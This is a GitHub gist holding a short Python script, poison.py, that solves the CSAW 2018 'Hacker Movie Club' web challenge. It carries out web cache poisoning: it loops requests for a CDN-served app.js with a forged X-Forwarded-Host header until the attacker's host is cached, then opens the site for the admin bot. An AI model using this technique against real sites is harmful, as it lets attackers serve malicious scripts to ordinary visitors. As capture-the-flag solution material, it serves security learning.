Skip to content

Instantly share code, notes, and snippets.

@LuD1161
Created September 17, 2018 10:33
Show Gist options
  • Save LuD1161/65b0d588cfbf93a94b64d0c3e76edbed to your computer and use it in GitHub Desktop.
Save LuD1161/65b0d588cfbf93a94b64d0c3e76edbed to your computer and use it in GitHub Desktop.
poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
from time import sleep
import requests
import webbrowser
X_Forwarded_Host = 'my_server'
while True:
resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
print resp.headers
sleep(0.5)
if X_Forwarded_Host in resp.text:
print resp.text
break
# Now we're sure that our entry has been put up in cache
# So, just open the webbrowser, and report so that the admin
# gets our cached page
webbrowser.open('http://app.hm.vulnerable.services/')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment